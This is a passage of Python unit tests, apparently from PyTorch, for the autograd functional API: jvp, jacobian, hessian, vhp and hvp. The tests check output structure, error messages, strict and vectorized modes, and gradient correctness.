inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, 2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], res[0])
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
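# _construct_standard_basis_for builds the basis vectors used by the vectorized
# Jacobian: column-blocks of an identity matrix, one block per input, each
# matching that input's dtype and device. Concatenated, they must form torch.eye.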
def _test_construct_standard_basis_for(self, inputs):
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
test_cases = [
(torch.randn(2), torch.randn(3, device='cuda')),
(torch.randn(3, device='cuda'), torch.randn(2)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
# vmap is an experimental prototype. When someone calls torch.vmap,
# it raises a python warning. This test checks that
# autogradF.{jacobian, hessian} don't surface that experimental-prototype
# warning: a public-facing API should not emit it, regardless of how it
# is called.
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
res = autogradF.jacobian(bar, inp, vectorize=vectorize)
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(inp), inp)
def foo(a, b):
return b, 3 * a.narrow(0, 0, 3)
inp = (torch.rand(4), torch.rand(5))
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
return self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
def test_jacobian_no_grad(self):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs)
self.assertIsNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
self.assertIsNotNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNone(res.grad_fn)
def identity(x):
return x.clone()
inputs = torch.rand(4)
res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, identity(inputs), inputs)
self.assertIsNone(res.grad_fn)
self.assertEqual(res, torch.eye(4))
def add_exp_reducer(x, y):
return (x + y.exp()).sum(dim=1)
inputs = (torch.rand(4, 4), torch.rand(4, 4))
res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
def _test_jacobian_create_graph(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_exp_reducer(x, y):
return (x + y).exp().sum(dim=1)
inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
torch.rand(4, 4, dtype=torch.double, requires_grad=True))
res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def foo(x, y):
x = x.cos()
val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs, test_forward_ad=True):
expected = autogradF.jacobian(f, inputs, vectorize=False)
result_backward_mode = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result_backward_mode, expected)
if test_forward_ad:
result_forward_mode = autogradF.jacobian(f, inputs, strategy="forward-mode", vectorize=True)
self.assertEqual(result_forward_mode, expected)
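# Compares the vmap-vectorized Jacobian (and, when requested, the forward-mode
# strategy) against the default non-vectorized implementation.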
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_zero_dim(self):
# zero-dim output
def f(x, y):
return x.sum(), y.sum(), x * y
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
# zero-dim input
def g(x):
return torch.stack([x, x, x])
x = torch.randn([])
self._check_jacobian_vectorize_correctness(g, x)
# Mixed zero-dim input / zero-dim output
def h(x, y):
return y.sum(), x * y
x = torch.randn([])
y = torch.randn(1)
self._check_jacobian_vectorize_correctness(h, (x, y))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
def f(x, y):
return x * y, (x * y).cuda()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
# The Jacobian computed with forward-mode AD has the dtype of the output,
# while the Jacobian computed with reverse-mode AD has the dtype of the input,
# so the forward-mode comparison is skipped here.
self._check_jacobian_vectorize_correctness(f, (x, y), test_forward_ad=False)
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
result_forward_mode = autogradF.hessian(f, inputs, outer_jacobian_strategy="forward-mode", vectorize=True)
self.assertEqual(result_forward_mode, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
# output unrelated to one input
def f(x, y):
return (x ** 2).sum()
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
# output unrelated to all inputs
def f(x, y):
return torch.ones([])
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
def _test_hessian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
def bar3(a):
return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
res = autogradF.hessian(bar, inp, vectorize=vectorize)
err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hessian(bar2, inp, vectorize=vectorize)
with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
res = autogradF.hessian(bar3, inp, vectorize=vectorize)
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A linear function, whose Jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hessian(foo, inp, strict=True)
res = autogradF.hessian(foo, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
res = autogradF.hessian(bar, inp, strict=True)
res = autogradF.hessian(bar, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hessian(bar2, inp, strict=True)
res = autogradF.hessian(bar2, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
def test_hessian_no_grad(self):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res.grad_fn)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2), torch.rand(2, 2))
res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
def test_hessian_output(self):
self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
inputs = torch.rand([])
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
torch.rand(2, 2, dtype=torch.double, requires_grad=True))
res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
def flatten(inp):
return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
def foo(x, y):
x = x.cos()
val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
res = autogradF.vhp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
res = autogradF.vhp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.vhp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.vhp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
res = autogradF.vhp(foo, inp, (v, 2))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A linear function, whose Jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vhp(foo, inp, v, strict=True)
res = autogradF.vhp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vhp(bar, inp, v, strict=True)
res = autogradF.vhp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.vhp(bar2, inp, v, strict=True)
res = autogradF.vhp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, vhp_val = autogradF.vhp(bar, inputs, v)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vhp_val[0].grad_fn)
self.assertIsNone(vhp_val[1].grad_fn)
def test_vhp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vhp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.vhp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_vhp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.vhp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(vhp_val[0].grad_fn)
self.assertIsNotNone(vhp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A linear function, whose Jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hvp(foo, inp, v, strict=True)
res = autogradF.hvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.hvp(bar, inp, v, strict=True)
res = autogradF.hvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hvp(bar2, inp, v, strict=True)
res = autogradF.hvp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, hvp_val = autogradF.hvp(bar, inputs, v)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(hvp_val[0].grad_fn)
self.assertIsNone(hvp_val[1].grad_fn)
def test_hvp_scalar(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.hvp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.exp().sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.hvp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_hvp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
